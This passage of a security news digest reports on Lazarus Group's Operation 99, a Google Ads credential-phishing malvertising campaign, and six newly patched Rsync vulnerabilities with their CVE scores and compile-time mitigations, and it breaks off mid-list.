    The malware architecture adopts a modular design and is flexible, capable of working across Windows, macOS, and Linux operating systems. It also serves to highlight the ever-evolving and adaptable nature of nation-state cyber threats.

    "For North Korea, hacking is a revenue-generating lifeline," Sherstobitoff said. "The Lazarus Group has consistently funneled stolen cryptocurrency to fuel the regime's ambitions, amassing staggering sums. With Web3 and cryptocurrency industries booming, Operation 99 zeroes in on these high-growth sectors."
  • Google Ads Users Targeted in Malvertising Scam Stealing Credentials and 2FA Codes
    thehackernews.com
    Jan 15, 2025 - Ravie Lakshmanan - Malvertising / Malware

    Cybersecurity researchers have alerted to a new malvertising campaign that's targeting individuals and businesses advertising via Google Ads by attempting to phish for their credentials via fraudulent ads on Google.

    "The scheme consists of stealing as many advertiser accounts as possible by impersonating Google Ads and redirecting victims to fake login pages," Jérôme Segura, senior director of threat intelligence at Malwarebytes, said in a report shared with The Hacker News.

    It's suspected the end goal of the campaign is to reuse the stolen credentials to further perpetuate the campaigns, while also selling them to other criminal actors on underground forums. Based on posts shared on Reddit, Bluesky, and Google's own support forums, the threat has been active since at least mid-November 2024.

    The activity cluster closely resembles campaigns that leverage stealer malware to steal data related to Facebook advertising and business accounts in order to hijack them and use the accounts to push out malvertising campaigns that further propagate the malware.

    The newly identified campaign specifically singles out users who search for Google Ads on Google's own search engine to serve bogus ads for Google Ads that, when clicked, redirect users to fraudulent sites hosted on Google Sites. These sites then serve as landing pages to lead the visitors to external phishing sites that are designed to capture their credentials and two-factor authentication (2FA) codes, which are exfiltrated via a WebSocket to a remote server under the attacker's control.

    "The fake ads for Google Ads come from a variety of individuals and businesses (including a regional airport), in various locations," Segura said. "Some of those accounts already had hundreds of other legitimate ads running."

    An ingenious aspect of the campaign is that it takes advantage of the fact that Google Ads does not require the final URL (the web page that users reach when they click on the ad) to be the same as the display URL, as long as the domains match. This allows the threat actors to host their intermediate landing pages on sites.google[.]com while keeping the display URLs as ads.google[.]com. What's more, the modus operandi entails the use of techniques like fingerprinting, anti-bot traffic detection, a CAPTCHA-inspired lure, cloaking, and obfuscation to conceal the phishing infrastructure.

    Malwarebytes said the harvested credentials are subsequently abused to sign in to the victim's Google Ads account, add a new administrator, and utilize their spending budgets for fake Google ads. In other words, the threat actors are taking over Google Ads accounts to push their own ads in order to add new victims to a growing pool of hacked accounts that are used to perpetuate the scam further.

    "There appear to be several individuals or groups behind these campaigns," Segura said. "Notably, the majority of them are Portuguese speakers and likely operating out of Brazil. The phishing infrastructure relies on intermediary domains with the .pt top-level domain (TLD), indicative of Portugal."

    "This malicious ad activity does not violate Google's ad rules. Threat actors are allowed to show fraudulent URLs in their ads, making them indistinguishable from legitimate sites. Google has yet to show that it takes definitive steps to freeze such accounts until their security is restored."

    The disclosure comes as Trend Micro revealed that attackers are using platforms such as YouTube and SoundCloud to distribute links to fake installers for pirated versions of popular software that ultimately lead to the deployment of various malware families such as Amadey, Lumma Stealer, Mars Stealer, Penguish, PrivateLoader, and Vidar Stealer.

    "Threat actors often use reputable file hosting services like Mediafire and Mega.nz to conceal the origin of their malware and make detection and removal more difficult," the company said. "Many malicious downloads are password-protected and encoded, which complicates analysis in security environments such as sandboxes and allows malware to evade early detection."
  • Google Cloud Researchers Uncover Flaws in Rsync File Synchronization Tool
    thehackernews.com
    Jan 15, 2025 - Ravie Lakshmanan - Vulnerability / Software Update

    As many as six security vulnerabilities have been disclosed in the popular Rsync file-synchronizing tool for Unix systems, some of which could be exploited to execute arbitrary code on a client.

    "Attackers can take control of a malicious server and read/write arbitrary files of any connected client," the CERT Coordination Center (CERT/CC) said in an advisory. "Sensitive data, such as SSH keys, can be extracted, and malicious code can be executed by overwriting files such as ~/.bashrc or ~/.popt."

    The shortcomings, which comprise heap-buffer overflow, information disclosure, file leak, external directory file-write, and symbolic-link race condition, are listed below:

    - CVE-2024-12084 (CVSS score: 9.8) - Heap-buffer overflow in Rsync due to improper checksum length handling
    - CVE-2024-12085 (CVSS score: 7.5) - Information leak via uninitialized stack contents
    - CVE-2024-12086 (CVSS score: 6.1) - Rsync server leaks arbitrary client files
    - CVE-2024-12087 (CVSS score: 6.5) - Path traversal vulnerability in Rsync
    - CVE-2024-12088 (CVSS score: 6.5) - --safe-links option bypass leads to path traversal
    - CVE-2024-12747 (CVSS score: 5.6) - Race condition in Rsync when handling symbolic links

    Simon Scannell, Pedro Gallegos, and Jasiel Spelman from Google Cloud Vulnerability Research have been credited with discovering and reporting the first five flaws. Security researcher Aleksei Gorban has been acknowledged for the symbolic-link race condition flaw.

    "In the most severe CVE, an attacker only requires anonymous read access to an Rsync server, such as a public mirror, to execute arbitrary code on the machine the server is running on," Red Hat Product Security's Nick Tait said.

    CERT/CC also noted that an attacker could combine CVE-2024-12084 and CVE-2024-12085 to achieve arbitrary code execution on a client that has an Rsync server running.

    Patches for the vulnerabilities have been released in Rsync version 3.4.0, which was made available earlier today. For users who are unable to apply the update, the following mitigations are recommended:

    - CVE-2024-12084 - Disable SHA* support by compiling with CFLAGS=-DDISABLE_SHA512_DIGEST and CFLAGS=-DDISABLE_SHA256_DIGEST
    - CVE-2024-12085 - Compile with -ftrivial-auto-var-init=zero to zero the stack contents